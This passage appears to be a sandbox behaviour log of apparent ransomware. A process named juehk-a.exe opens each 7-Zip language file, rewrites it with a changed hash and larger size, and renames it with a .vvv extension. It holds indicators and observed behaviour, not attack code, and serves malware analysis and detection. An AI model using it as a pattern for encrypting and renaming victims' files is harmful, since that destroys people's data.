- sha1sum: 4b2759b5c588b1040e9938c08d23eee328311703
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519724
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 60062
- mode: rename
- sequenceNumber: 758
- filesize: 11070
- md5sum: 9455d2c83b2e185ad45eb531e9532bb6
- sha1sum: 4b2759b5c588b1040e9938c08d23eee328311703
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\br.txt
- new_name: C:\Program Files\7-Zip\Lang\br.txt.vvv
- ads:
- fid (ads:): 562949953519724
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 60082
- mode: open
- sequenceNumber: 759
- value: C:\Program Files\7-Zip\Lang\ca.txt
- filesize: 13798
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519725
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 60347
- mode: close
- sequenceNumber: 760
- value: C:\Program Files\7-Zip\Lang\ca.txt
- filesize: 14222
- md5sum: d35d7f9279f165f4da80f1a714e49a74
- sha1sum: b6027c21718517a09e99a43ae40d9bbf6160ce3e
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519725
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 60395
- mode: rename
- sequenceNumber: 761
- filesize: 14222
- md5sum: d35d7f9279f165f4da80f1a714e49a74
- sha1sum: b6027c21718517a09e99a43ae40d9bbf6160ce3e
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\ca.txt
- new_name: C:\Program Files\7-Zip\Lang\ca.txt.vvv
- ads:
- fid (ads:): 562949953519725
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 60407
- mode: open
- sequenceNumber: 762
- value: C:\Program Files\7-Zip\Lang\cs.txt
- filesize: 14109
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519726
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 60514
- mode: close
- sequenceNumber: 763
- value: C:\Program Files\7-Zip\Lang\cs.txt
- filesize: 14526
- md5sum: 2a0405cfff759b4e80a3dafcf5d355c4
- sha1sum: 6d46fda5eb8dac52b70fa97c8e4db164751ed445
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519726
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 60567
- mode: rename
- sequenceNumber: 764
- filesize: 14526
- md5sum: 2a0405cfff759b4e80a3dafcf5d355c4
- sha1sum: 6d46fda5eb8dac52b70fa97c8e4db164751ed445
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\cs.txt
- new_name: C:\Program Files\7-Zip\Lang\cs.txt.vvv
- ads:
- fid (ads:): 562949953519726
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 60572
- mode: open
- sequenceNumber: 765
- value: C:\Program Files\7-Zip\Lang\cy.txt
- filesize: 10645
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519727
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 60781
- mode: close
- sequenceNumber: 766
- value: C:\Program Files\7-Zip\Lang\cy.txt
- filesize: 11070
- md5sum: b9c1dffac38bf486864b82dafe0aa96b
- sha1sum: f2cce153979e6e037238081b7846567277bc0777
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519727
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 60805
- mode: rename
- sequenceNumber: 767
- filesize: 11070
- md5sum: b9c1dffac38bf486864b82dafe0aa96b
- sha1sum: f2cce153979e6e037238081b7846567277bc0777
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\cy.txt
- new_name: C:\Program Files\7-Zip\Lang\cy.txt.vvv
- ads:
- fid (ads:): 562949953519727
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 60842
- mode: open
- sequenceNumber: 768
- value: C:\Program Files\7-Zip\Lang\da.txt
- filesize: 12946
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519728
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 60901
- mode: close
- sequenceNumber: 769
- value: C:\Program Files\7-Zip\Lang\da.txt
- filesize: 13374
- md5sum: aee8c0dd237b4fdbe14510d440cb1069
- sha1sum: b1fe7289246fe98be0f78e4663bd6688c6b4a7b5
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519728
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 60916
- mode: rename
- sequenceNumber: 770
- filesize: 13374
- md5sum: aee8c0dd237b4fdbe14510d440cb1069
- sha1sum: b1fe7289246fe98be0f78e4663bd6688c6b4a7b5
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\da.txt
- new_name: C:\Program Files\7-Zip\Lang\da.txt.vvv
- ads:
- fid (ads:): 562949953519728
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 60926
- mode: open
- sequenceNumber: 771
- value: C:\Program Files\7-Zip\Lang\de.txt
- filesize: 14513
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519729
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 60981
- mode: close
- sequenceNumber: 772
- value: C:\Program Files\7-Zip\Lang\de.txt
- filesize: 14942
- md5sum: 3d82a1ae1f0cd12b89f74baa99dd5b7b
- sha1sum: e32b5a7d4ebc42cbf9f0ebbf510462348786629c
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519729
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 60990
- mode: rename
- sequenceNumber: 773
- filesize: 14942
- md5sum: 3d82a1ae1f0cd12b89f74baa99dd5b7b
- sha1sum: e32b5a7d4ebc42cbf9f0ebbf510462348786629c
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\de.txt
- new_name: C:\Program Files\7-Zip\Lang\de.txt.vvv
- ads:
- fid (ads:): 562949953519729
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 60996
- mode: open
- sequenceNumber: 774
- value: C:\Program Files\7-Zip\Lang\el.txt
- filesize: 21536
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519730
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 61021
- mode: close
- sequenceNumber: 775
- value: C:\Program Files\7-Zip\Lang\el.txt
- filesize: 21966
- md5sum: e9bdb0f8f3b4f66111984274d9572308
- sha1sum: ccb1e767b9f0deb947b5239c6b836a51d709e99b
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519730
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 61044
- mode: rename
- sequenceNumber: 776
- filesize: 21966
- md5sum: e9bdb0f8f3b4f66111984274d9572308
- sha1sum: ccb1e767b9f0deb947b5239c6b836a51d709e99b
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\el.txt
- new_name: C:\Program Files\7-Zip\Lang\el.txt.vvv
- ads:
- fid (ads:): 562949953519730
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 61057
- mode: open
- sequenceNumber: 777
- value: C:\Program Files\7-Zip\Lang\eo.txt
- filesize: 10637
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519731
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 61229
- mode: close
- sequenceNumber: 778
- value: C:\Program Files\7-Zip\Lang\eo.txt
- filesize: 11054
- md5sum: 95c40073165910307049686b4819553d
- sha1sum: 1a563445faab6ffa6557190efcd942f20ec8cd8f
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519731
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 61315
- mode: rename
- sequenceNumber: 779
- filesize: 11054
- md5sum: 95c40073165910307049686b4819553d
- sha1sum: 1a563445faab6ffa6557190efcd942f20ec8cd8f
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\eo.txt
- new_name: C:\Program Files\7-Zip\Lang\eo.txt.vvv
- ads:
- fid (ads:): 562949953519731
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 61367
- mode: open
- sequenceNumber: 780
- value: C:\Program Files\7-Zip\Lang\es.txt
- filesize: 14521
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519732
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 61443
- mode: close
- sequenceNumber: 781
- value: C:\Program Files\7-Zip\Lang\es.txt
- filesize: 14942
- md5sum: e2499d460fcaa10b7e3e485a59086981
- sha1sum: fe82dd6b5bbc67fe223ae622ba63dea07450d680
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519732
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 61453
- mode: rename
- sequenceNumber: 782
- filesize: 14942
- md5sum: e2499d460fcaa10b7e3e485a59086981
- sha1sum: fe82dd6b5bbc67fe223ae622ba63dea07450d680
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\es.txt
- new_name: C:\Program Files\7-Zip\Lang\es.txt.vvv
- ads:
- fid (ads:): 562949953519732
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 61473
- mode: open
- sequenceNumber: 783
- value: C:\Program Files\7-Zip\Lang\et.txt
- filesize: 13481
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519733
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 61645
- mode: close
- sequenceNumber: 784
- value: C:\Program Files\7-Zip\Lang\et.txt
- filesize: 13902
- md5sum: 887bcb092f8ab69c6f1af6b4d659384d
- sha1sum: 53e45487c2407fd190755eeb1b6b9206bf25419a
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519733
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 61661
- mode: rename
- sequenceNumber: 785
- filesize: 13902
- md5sum: 887bcb092f8ab69c6f1af6b4d659384d
- sha1sum: 53e45487c2407fd190755eeb1b6b9206bf25419a
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\et.txt
- new_name: C:\Program Files\7-Zip\Lang\et.txt.vvv
- ads:
- fid (ads:): 562949953519733
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 61713
- mode: open
- sequenceNumber: 786
- value: C:\Program Files\7-Zip\Lang\eu.txt
- filesize: 12799
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519734
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 61801
- mode: close
- sequenceNumber: 787
- value: C:\Program Files\7-Zip\Lang\eu.txt
- filesize: 13214
- md5sum: f79c6b750d043c42ba64c7213929790b
- sha1sum: e5dd3082d88f5496eb93adc70224054838ba4d77
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519734
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 61815
- mode: rename
- sequenceNumber: 788
- filesize: 13214
- md5sum: f79c6b750d043c42ba64c7213929790b
- sha1sum: e5dd3082d88f5496eb93adc70224054838ba4d77
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\eu.txt
- new_name: C:\Program Files\7-Zip\Lang\eu.txt.vvv
- ads:
- fid (ads:): 562949953519734
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 61824
- mode: open
- sequenceNumber: 789
- value: C:\Program Files\7-Zip\Lang\ext.txt
- filesize: 14145
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519735
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 61859
- mode: close
- sequenceNumber: 790
- value: C:\Program Files\7-Zip\Lang\ext.txt
- filesize: 14574
- md5sum: 2c475554df7ab80ff50f5e2494787127
- sha1sum: 53ebbd6bade882e4743ba5ee8f4e565c72726030
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519735
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 61866
- mode: rename
- sequenceNumber: 791
- filesize: 14574
- md5sum: 2c475554df7ab80ff50f5e2494787127
- sha1sum: 53ebbd6bade882e4743ba5ee8f4e565c72726030
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\ext.txt
- new_name: C:\Program Files\7-Zip\Lang\ext.txt.vvv
- ads:
- fid (ads:): 562949953519735
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 61871
- mode: open
- sequenceNumber: 792
- value: C:\Program Files\7-Zip\Lang\fa.txt
- filesize: 16655
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519736
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 61942
- mode: close
- sequenceNumber: 793
- value: C:\Program Files\7-Zip\Lang\fa.txt
- filesize: 17070
- md5sum: 9685a9850970e3c60af41f5a5cd9a3b1
- sha1sum: 76a790a34200ab347b83f8b5ec90f879155c4579
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519736
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 61949
- mode: rename
- sequenceNumber: 794
- filesize: 17070
- md5sum: 9685a9850970e3c60af41f5a5cd9a3b1
- sha1sum: 76a790a34200ab347b83f8b5ec90f879155c4579
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\fa.txt
- new_name: C:\Program Files\7-Zip\Lang\fa.txt.vvv
- ads:
- fid (ads:): 562949953519736
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 61954
- mode: open
- sequenceNumber: 795
- value: C:\Program Files\7-Zip\Lang\fi.txt
- filesize: 14165
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519737
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 62014
- mode: close
- sequenceNumber: 796
- value: C:\Program Files\7-Zip\Lang\fi.txt
- filesize: 14590
- md5sum: d1c5c9bcccb1ea11314e0bf80d0704be
- sha1sum: bc5dca404c5c561c965cd2fd9ab6946d7b81a8bc
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519737
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 62023
- mode: rename
- sequenceNumber: 797
- filesize: 14590
- md5sum: d1c5c9bcccb1ea11314e0bf80d0704be
- sha1sum: bc5dca404c5c561c965cd2fd9ab6946d7b81a8bc
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\fi.txt
- new_name: C:\Program Files\7-Zip\Lang\fi.txt.vvv
- ads:
- fid (ads:): 562949953519737
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 62028
- mode: open
- sequenceNumber: 798
- value: C:\Program Files\7-Zip\Lang\fr.txt
- filesize: 14652
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519738
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 62067
- mode: close
- sequenceNumber: 799
- value: C:\Program Files\7-Zip\Lang\fr.txt
- filesize: 15070
- md5sum: 06c6f9f10bc4c3f8ea0b0851db0a7696
- sha1sum: 3b7cab7ac0708bdbb805a500a4dcaff31e04c618
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519738
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 62133
- mode: rename
- sequenceNumber: 800
- filesize: 15070
- md5sum: 06c6f9f10bc4c3f8ea0b0851db0a7696
- sha1sum: 3b7cab7ac0708bdbb805a500a4dcaff31e04c618
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\fr.txt
- new_name: C:\Program Files\7-Zip\Lang\fr.txt.vvv
- ads:
- fid (ads:): 562949953519738
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 62145
- mode: open
- sequenceNumber: 801
- value: C:\Program Files\7-Zip\Lang\fur.txt
- filesize: 13894
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519739
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 62192
- mode: close
- sequenceNumber: 802
- value: C:\Program Files\7-Zip\Lang\fur.txt
- filesize: 14318
- md5sum: 6af11e57a425e755fc08ea14027f419c
- sha1sum: 9a09973970baaec539e599d68b794b950082eee0
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519739
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 62205
- mode: rename
- sequenceNumber: 803
- filesize: 14318
- md5sum: 6af11e57a425e755fc08ea14027f419c
- sha1sum: 9a09973970baaec539e599d68b794b950082eee0
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\fur.txt
- new_name: C:\Program Files\7-Zip\Lang\fur.txt.vvv
- ads:
- fid (ads:): 562949953519739
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 62223
- mode: open
- sequenceNumber: 804
- value: C:\Program Files\7-Zip\Lang\fy.txt
- filesize: 12468
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519740
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 62335
- mode: close
- sequenceNumber: 805
- value: C:\Program Files\7-Zip\Lang\fy.txt
- filesize: 12894
- md5sum: b3ffafdf8e6aa3bfc3d10dc41530cb49
- sha1sum: 7b4ab97f5ea29bff01370a5ab2e0566318e118b8
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519740
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 62392
- mode: rename
- sequenceNumber: 806
- filesize: 12894
- md5sum: b3ffafdf8e6aa3bfc3d10dc41530cb49
- sha1sum: 7b4ab97f5ea29bff01370a5ab2e0566318e118b8
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\fy.txt
- new_name: C:\Program Files\7-Zip\Lang\fy.txt.vvv
- ads:
- fid (ads:): 562949953519740
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 62434
- mode: open
- sequenceNumber: 807
- value: C:\Program Files\7-Zip\Lang\gl.txt
- filesize: 10590
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519741
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 62611
- mode: close
- sequenceNumber: 808
- value: C:\Program Files\7-Zip\Lang\gl.txt
- filesize: 11006
- md5sum: 73be24c416880294b4d59099bf2435ff
- sha1sum: d4bda2a8e9cfebf225447264327920c356dbd428
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519741
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 62643
- mode: rename
- sequenceNumber: 809
- filesize: 11006
- md5sum: 73be24c416880294b4d59099bf2435ff
- sha1sum: d4bda2a8e9cfebf225447264327920c356dbd428
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\gl.txt
- new_name: C:\Program Files\7-Zip\Lang\gl.txt.vvv
- ads:
- fid (ads:): 562949953519741
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 62706
- mode: open
- sequenceNumber: 810
- value: C:\Program Files\7-Zip\Lang\gu.txt
- filesize: 26704
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519742
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 62955
- mode: close
- sequenceNumber: 811
- value: C:\Program Files\7-Zip\Lang\gu.txt
- filesize: 27134
- md5sum: 1ad7f1d20448f00c50934a4425c8b043
- sha1sum: b7895931ddd16eff502f217020154b2cde80f071
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519742
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 62960
- mode: rename
- sequenceNumber: 812
- filesize: 27134
- md5sum: 1ad7f1d20448f00c50934a4425c8b043
- sha1sum: b7895931ddd16eff502f217020154b2cde80f071
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\gu.txt
- new_name: C:\Program Files\7-Zip\Lang\gu.txt.vvv
- ads:
- fid (ads:): 562949953519742
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 62966
- mode: open
- sequenceNumber: 813
- value: C:\Program Files\7-Zip\Lang\he.txt
- filesize: 16419
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519743
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 63182
- mode: close
- sequenceNumber: 814
- value: C:\Program Files\7-Zip\Lang\he.txt
- filesize: 16846
- md5sum: 2627e549b5a90a43426990e19b5062ea
- sha1sum: acdb0329383aa64338622c0e5ec7558526ce2445
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519743
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 63196
- mode: rename
- sequenceNumber: 815
- filesize: 16846
- md5sum: 2627e549b5a90a43426990e19b5062ea
- sha1sum: acdb0329383aa64338622c0e5ec7558526ce2445
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\he.txt
- new_name: C:\Program Files\7-Zip\Lang\he.txt.vvv
- ads:
- fid (ads:): 562949953519743
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 63224
- mode: open
- sequenceNumber: 816
- value: C:\Program Files\7-Zip\Lang\hi.txt
- filesize: 26795
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519744
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 63834
- mode: close
- sequenceNumber: 817
- value: C:\Program Files\7-Zip\Lang\hi.txt
- filesize: 27214
- md5sum: 7957a2643e018dadec6a3db7114ffdd1
- sha1sum: 0f11e4deb3e56f4ed71fae67e58691324e3a287b
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
